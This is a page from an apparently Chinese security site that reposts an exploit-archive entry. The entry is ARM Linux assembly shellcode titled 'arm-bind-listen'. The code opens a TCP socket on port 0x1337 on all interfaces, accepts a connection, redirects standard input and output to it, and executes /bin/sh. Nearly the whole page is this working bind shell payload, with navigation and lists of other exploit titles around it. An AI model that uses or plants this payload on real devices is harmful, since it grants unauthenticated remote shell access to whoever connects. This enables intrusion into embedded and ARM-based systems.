首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ARM Bindshell port 0x1337
来源:gmail account dgodas 作者:Daniel 发布时间:2010-10-26  

/*
 * Title: arm-bind-listen
 * Brief: Bind a shell to port 0x1337 on any local address and
 *        wait for connections
 * Author: Daniel Godas-Lopez <gmail account dgodas>
 */

 /*
   soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  */

 mov %r0, $2  /* AF_INET */
 mov %r1, $1  /* SOCK_STREAM */
 mov %r2, $6  /* IPPRTOTO_TCP */
 push {%r0, %r1, %r2}
 mov %r0, $1  /* socket */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $12

 mov %r6, %r0  /* r6 = soc_des */

 /*
   bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
  */

.if 0 /* r0 == r6 already */
 mov %r0, %r6  /* soc_des */
.endif

 mov %r1, $0x37
 mov %r7, $0x13
 mov %r1, %r1, lsl $24
 add %r1, %r7, lsl $16
 add %r1, $2  /* port = 0x1337, family = 2 (AF_INET) */
 sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
 push {%r1, %r2}
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in) */
 
 push {%r0, %r1, %r2}
 mov %r0, $2  /* bind */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $20

 /*
   listen(soc_des, 1);
  /*

 mov %r1, $1  /* backlog (see man 2 listen) */
 mov %r0, %r6  /* soc_des */
 push {%r0, %r1}
 mov %r0, $4  /* listen */
 mov %r1, %sp
 svc 0x00900066
 add %sp, $8

 /*
   soc_cli = accept(soc_des, 0, 0);
  */

 mov %r0, %r6  /* soc_des */
 sub %r1, %r1, %r1
 sub %r2, %r2, %r2
 push {%r0, %r1, %r2}
 mov %r0, $5  /* accept */
 mov %r1, %sp
 svc 0x00900066
 add %sp, %sp, $12

 mov %r6, %r0  /* r6 = soc_cli */

 /*
   dup2(soc_cli,0);
   dup2(soc_cli,1);
   dup2(soc_cli,2);
  */
 mov %r1, $2
1: mov %r0, %r6
 svc 0x0090003f
 subs %r1, %r1, $1
 bpl 1b

 /*
   execve("/bin/sh", parms, env);
  */

 sub %r1, %sp, $4 /* argv[0] = "sh" */
 sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
 mov %r3, $0x2f
 mov %r7, $0x62
 add %r3, %r7, lsl $8
 mov %r7, $0x69
 add %r3, %r7, lsl $16
 mov %r7, $0x6e
 add %r3, %r7, lsl $24 /* '/'  'b'  'i'  'n'  */
 mov %r4, $0x2f
 mov %r7, $0x73
 add %r4, %r7, lsl $8
 mov %r7, $0x68
 add %r4, %r7, lsl $16 /* '/'  's'  'h'  0x00 */
 mov %r5, $0x73
 mov %r7, $0x68
 add %r5, %r7, lsl $8 /* 's'  'h'  0x00 0x00 */

 push {%r1, %r2, %r3, %r4, %r5}

 add %r0, %sp, $8 /* filename ptr */
 add %r1, %sp, $0 /* argv ptr */
 add %r2, %sp, $4 /* env ptr */

 svc 0x0090000b


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp 5.5.8.2985 (in_mod plug
·ARM Bind Connect UDP Port 68
·ARM Loader Port 0x1337
·Jamb CSRF Arbitrary Add a Post
·ARM ifconfig eth0 and Assign A
·HP Data Protector Media Operat
·AnyDVD <= 6.7.1.0 Denial Of Se
·Linux Kernel 2.6.32 Local Root
·RarmaRadio v2.52 (.m3u) Denial
·NitroSecurity ESM v8.4.0a Remo
·GNU C library dynamic linker L
·Apache 2.2 (Windows) Local Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved